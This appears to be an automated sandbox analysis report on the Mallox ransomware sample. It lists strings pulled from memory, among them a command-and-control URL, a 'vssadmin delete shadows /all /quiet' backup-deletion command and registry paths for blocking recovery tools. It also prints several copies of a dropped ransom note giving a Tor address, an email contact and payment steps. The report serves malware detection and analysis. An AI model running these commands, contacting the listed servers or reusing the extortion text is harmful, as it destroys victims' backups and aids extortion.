      Source: Ransomware Mallox.exe, 00000000.00000003.1511802024.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1521991452.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1535009034.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1515993832.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1505219295.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1509849904.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1507859258.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1508435716.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1512198939.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1507580206.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.php7xM
      Source: Ransomware Mallox.exeString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.phpContent-Type:
      Source: Ransomware Mallox.exe, 00000000.00000003.1548290712.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1948626824.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546299993.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1696834790.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1535009034.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1699524403.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1542067078.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545040056.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1928997675.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1547580317.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1551313529.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1692939049.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537894611.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1559096802.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1700357889.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1979510307.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1558037196.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1930536289.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1549649553.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1811590111.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1976418160.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.phpNxw
      Source: Ransomware Mallox.exe, 00000000.00000003.1495367476.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1490580877.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487434442.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1503545999.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487048074.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1489751960.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1494233966.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1496750386.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1491235259.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.phpkxh
      Source: Ransomware Mallox.exe, 00000000.00000003.1521991452.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.phpkz
      Source: Ransomware Mallox.exe, 00000000.00000003.1546376683.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537835548.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1557947339.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1540574771.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545983166.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.phplencoded
      Source: Ransomware Mallox.exe, 00000000.00000003.1495367476.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1490580877.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487434442.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1503545999.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487048074.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1489751960.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1494233966.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1496750386.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1491235259.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.phppxM
      Source: Ransomware Mallox.exe, 00000000.00000003.1546376683.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1517525405.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537835548.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1558677864.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1557947339.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1540574771.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1525372800.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1531166316.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545983166.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1533218205.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1516802551.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1522125993.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.phpwshqos.dll7
      Source: Ransomware Mallox.exe, 00000000.00000003.1548290712.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546299993.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1535009034.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1542067078.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545040056.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1547580317.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1551313529.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537894611.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1559096802.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1558037196.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1549649553.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/QWEwqdsvsf/ap.phpyxZ
      Source: Ransomware Mallox.exe, 00000000.00000003.1455252517.0000023CAFEA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.142/ows
      Source: Ransomware Mallox.exe, 00000000.00000003.1735001126.0000023CADEA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
      Source: Ransomware Mallox.exe, 00000000.00000003.1548290712.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1495367476.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1511802024.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1948626824.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546299993.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1696834790.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1521991452.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1535009034.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1699524403.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1490580877.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1542067078.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487434442.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1503545999.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545040056.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1928997675.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1547580317.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1551313529.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1515993832.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1692939049.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1505219295.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1509849904.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
      Source: Ransomware Mallox.exe, 00000000.00000003.1435423549.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/?
      Source: Ransomware Mallox.exe, 00000000.00000003.1735001126.0000023CADEA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orga
      Source: Ransomware Mallox.exeString found in binary or memory: http://api.ipify.orgx32x64%s
      Source: Ransomware Mallox.exe, 00000000.00000003.1460333489.0000023CAFF69000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1478330265.0000023CAFF31000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1515736964.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1518812177.0000023CAFE76000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1516446126.0000023CAFF2F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1514485603.0000023CAFE88000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1517731549.0000023CAFE7E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1478506610.0000023CAFF3B000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1536625865.0000023CAFF3B000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546376683.0000023CAFF30000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546792697.0000023CAFF3B000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1514485603.0000023CAFE80000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1518812177.0000023CAFE7E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1504591726.0000023CAFF2F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1491535677.0000023CAFF2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
      Source: Ransomware Mallox.exe, HOW TO BACK FILES.txt571.0.dr, HOW TO BACK FILES.txt661.0.dr, HOW TO BACK FILES.txt5.0.dr, HOW TO BACK FILES.txt13.0.dr, HOW TO BACK FILES.txt624.0.dr, HOW TO BACK FILES.txt317.0.dr, HOW TO BACK FILES.txt323.0.dr, HOW TO BACK FILES.txt50.0.dr, HOW TO BACK FILES.txt366.0.dr, HOW TO BACK FILES.txt169.0.dr, HOW TO BACK FILES.txt413.0.dr, HOW TO BACK FILES.txt370.0.dr, HOW TO BACK FILES.txt307.0.dr, HOW TO BACK FILES.txt369.0.dr, HOW TO BACK FILES.txt773.0.dr, HOW TO BACK FILES.txt98.0.dr, HOW TO BACK FILES.txt714.0.dr, HOW TO BACK FILES.txt757.0.dr, HOW TO BACK FILES.txt65.0.dr, HOW TO BACK FILES.txt186.0.drString found in binary or memory: https://www.torproject.org/download/
      Source: Ransomware Mallox.exe, 00000000.00000003.1774269029.0000023CB00B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _WCE47~1.AU3_WinAPI_RegisterRawInputDevices.au3memstr_652a96a8-8

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Found ransom note / readme
      Source: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txtDropped file: HelloYour files are encrypted and can not be usedWe have downloaded your confidential data and are ready to publish it on our blogTo return your files in work condition you need decryption toolFollow the instructions to decrypt all your dataDo not try to change or restore files yourself, this will break themIf you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MBHow to get decryption tool:1) Download and install TOR browser by this link: https://www.torproject.org/download/2) If TOR blocked in your country and you can't access to the link then use any VPN software3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A905) You will see payment information and we can make free test decryption here6)After payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youOur blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionIf you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgWaiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.Jump to dropped file
      Yara detected RansomwareGeneric
      Source: Yara matchFile source: Process Memory Space: Ransomware Mallox.exe PID: 7740, type: MEMORYSTR
      Yara detected Targeted Ransomware
      Source: Yara matchFile source: Process Memory Space: Ransomware Mallox.exe PID: 7740, type: MEMORYSTR
      Deletes shadow drive data (may be related to ransomware)
      Source: Ransomware Mallox.exe, 00000000.00000000.1372372560.00007FF67EBA7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: \sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exeAES-128-ECBAES-192-ECBAES-256-ECBAES-128-CBCAES-192-CBCAES-256-CBCAES-128-CFB128AES-192-CFB128AES-256-CFB128AES-128-OFBAES-192-OFBAES-256-OFBAES-128-CTRAES-192-CTRAES-256-CTRAES-128-XTSAES-256-XTSAES-128-GCMAES-192-GCMAES-256-GCMAES-128-CCMAES-192-CCMAES-256-CCMAES-128-CCM*-NO-TAGAES-192-CCM*-NO-TAGAES-256-CCM*-NO-TAGCAMELLIA-128-ECBCAMELLIA-192-ECBCAMELLIA-256-ECBCAMELLIA-128-CBCCAMELLIA-192-CBCCAMELLIA-256-CBCCAMELLIA-128-CFB128CAMELLIA-192-CFB128CAMELLIA-256-CFB128CAMELLIA-128-CTRCAMELLIA-192-CTRCAMELLIA-256-CTRCAMELLIA-128-GCMCAMELLIA-192-GCMCAMELLIA-256-GCMCAMELLIA-128-CCMCAMELLIA-192-CCMCAMELLIA-256-CCMCAMELLIA-128-CCM*-NO-TAGCAMELLIA-192-CCM*-NO-TAGCAMELLIA-256-CCM*-NO-TAGARIA-128-ECBARIA-192-ECBARIA-256-ECBARIA-128-CBCARIA-192-CBCARIA-256-CBCARIA-128-CFB128ARIA-192-CFB128ARIA-256-CFB128ARIA-128-CTRARIA-192-CTRARIA-256-CTRARIA-128-GCMARIA-192-GCMARIA-256-GCMARIA-128-CCMARIA-192-CCMARIA-256-CCMARIA-128-CCM*-NO-TAGARIA-192-CCM*-NO-TAGARIA-256-CCM*-NO-TAGDES-ECBDES-CBCDES-EDE-ECBDES-EDE-CBCDES-EDE3-ECBDES-EDE3-CBCCHACHA20CHACHA20-POLY1305AES-128-KWAES-192-KWAES-256-KWAES-128-KWPAES-192-KWPAES-256-KWPMD5RIPEMD160SHA1SHA224SHA256SHA384SHA512
      Source: Ransomware Mallox.exeBinary or memory string: \sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exeAES-128-ECBAES-192-ECBAES-256-ECBAES-128-CBCAES-192-CBCAES-256-CBCAES-128-CFB128AES-192-CFB128AES-256-CFB128AES-128-OFBAES-192-OFBAES-256-OFBAES-128-CTRAES-192-CTRAES-256-CTRAES-128-XTSAES-256-XTSAES-128-GCMAES-192-GCMAES-256-GCMAES-128-CCMAES-192-CCMAES-256-CCMAES-128-CCM*-NO-TAGAES-192-CCM*-NO-TAGAES-256-CCM*-NO-TAGCAMELLIA-128-ECBCAMELLIA-192-ECBCAMELLIA-256-ECBCAMELLIA-128-CBCCAMELLIA-192-CBCCAMELLIA-256-CBCCAMELLIA-128-CFB128CAMELLIA-192-CFB128CAMELLIA-256-CFB128CAMELLIA-128-CTRCAMELLIA-192-CTRCAMELLIA-256-CTRCAMELLIA-128-GCMCAMELLIA-192-GCMCAMELLIA-256-GCMCAMELLIA-128-CCMCAMELLIA-192-CCMCAMELLIA-256-CCMCAMELLIA-128-CCM*-NO-TAGCAMELLIA-192-CCM*-NO-TAGCAMELLIA-256-CCM*-NO-TAGARIA-128-ECBARIA-192-ECBARIA-256-ECBARIA-128-CBCARIA-192-CBCARIA-256-CBCARIA-128-CFB128ARIA-192-CFB128ARIA-256-CFB128ARIA-128-CTRARIA-192-CTRARIA-256-CTRARIA-128-GCMARIA-192-GCMARIA-256-GCMARIA-128-CCMARIA-192-CCMARIA-256-CCMARIA-128-CCM*-NO-TAGARIA-192-CCM*-NO-TAGARIA-256-CCM*-NO-TAGDES-ECBDES-CBCDES-EDE-ECBDES-EDE-CBCDES-EDE3-ECBDES-EDE3-CBCCHACHA20CHACHA20-POLY1305AES-128-KWAES-192-KWAES-256-KWAES-128-KWPAES-192-KWPAES-256-KWPMD5RIPEMD160SHA1SHA224SHA256SHA384SHA512
      Writes a notice file (html or txt) to demand a ransom
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
